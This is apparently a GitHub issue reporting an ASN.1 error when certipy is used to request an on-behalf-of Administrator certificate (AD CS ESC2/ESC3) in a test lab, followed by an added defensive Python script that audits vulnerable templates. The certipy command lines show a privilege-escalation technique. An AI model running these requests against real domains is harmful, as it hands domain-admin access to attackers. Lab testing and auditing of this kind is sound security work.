I am building an environment to test ESC2 and ESC3. I have an AD CS template with EKU "Any purpose" set up as well as the default "User" template published.
First off I'll fetch the "Any purpose" EKU (ESC2/3) template:
Then I'll use that pfx to sign a new CSR and apply for a client authentication certificate via the default template `User` on behalf of the Administrator.
```
/usr/local/bin/certipy req -u test@domain.local -p ******** -ca test-corp-CA01-CA -template User -on-behalf-of 'DOMAIN\Administrator' -target-ip x.x.x.x -dc-ip x.x.x.x. -pfx test.pfx
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
[*] Request ID is 114
Would you like to save the private key? (y/N)
```
I get the same error when I try to renew the initial test.pfx certificate.
```
/usr/local/bin/certipy req -renew -u test@domain.local -p ******** -ca test-corp-CA01-CA -template esc2 -target-ip x.x.x.x -dc-ip x.x.x.x -pfx test.pfx
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
[*] Request ID is 115
Would you like to save the private key? (y/N)
```
The ESC2/3 privesc works fine from `certify.exe` from a domain-joined Windows box.
I have tried to figure out which ASN.1 tag in https://github.com/ly4k/Certipy/blob/main/certipy/lib/certificate.py#L525 might be wrong, however I'm not successful.
I'm on the latest `92592c59acf50e5db3ace2947680614c110aff82` commit.
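Added example, not part of the original issue and not Certipy code: a defender-side check that flags a template like the `esc2` one described above, whose certificate a low-privileged user can obtain and then use to sign on-behalf-of requests. The record layout, the `low_priv_can_enroll` field and the sample templates are assumptions constructed for illustration; the attribute names and OIDs are the standard AD CS ones.

```python
# Added example: audit check for the ESC2/ESC3 first-stage template conditions.
ANY_PURPOSE = "2.5.29.37.0"                    # anyExtendedKeyUsage
CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"  # Certificate Request Agent
CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
CT_FLAG_PEND_ALL_REQUESTS = 0x2                # CA manager approval required


def audit_template(t):
    """Return ESC2/ESC3 findings for one template record (dict of attributes)."""
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    pending = bool(t.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS)
    signatures = t.get("msPKI-RA-Signature", 0)
    # Assumption: the enrollment ACL was resolved beforehand into this
    # hypothetical boolean (True if ordinary domain users may enroll).
    low_priv = t.get("low_priv_can_enroll", False)
    # If approval or an agent signature gates issuance, nothing is flagged.
    if not low_priv or pending or signatures > 0:
        return []
    findings = []
    if not ekus or ANY_PURPOSE in ekus:
        findings.append("ESC2: Any Purpose or empty EKU with open enrollment")
    if CERT_REQUEST_AGENT in ekus:
        findings.append("ESC3: Certificate Request Agent EKU with open enrollment")
    return findings


def audit_all(templates):
    """Map template name -> findings, keeping only flagged templates."""
    results = {t["name"]: audit_template(t) for t in templates}
    return {name: f for name, f in results.items() if f}


# Constructed sample records, not exported from a real directory.
SAMPLE_TEMPLATES = [
    {"name": "esc2", "pKIExtendedKeyUsage": [ANY_PURPOSE],
     "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
     "low_priv_can_enroll": True},
    {"name": "User", "pKIExtendedKeyUsage": [CLIENT_AUTH],
     "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
     "low_priv_can_enroll": True},
    {"name": "AgentGated", "pKIExtendedKeyUsage": [CERT_REQUEST_AGENT],
     "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
     "msPKI-RA-Signature": 0, "low_priv_can_enroll": True},
]

if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_TEMPLATES).items():
        print(name, findings)
```

The check covers only the first-stage template; whether a second template such as `User` accepts agent-signed requests, and whether the CA enforces enrollment agent restrictions, has to be reviewed separately.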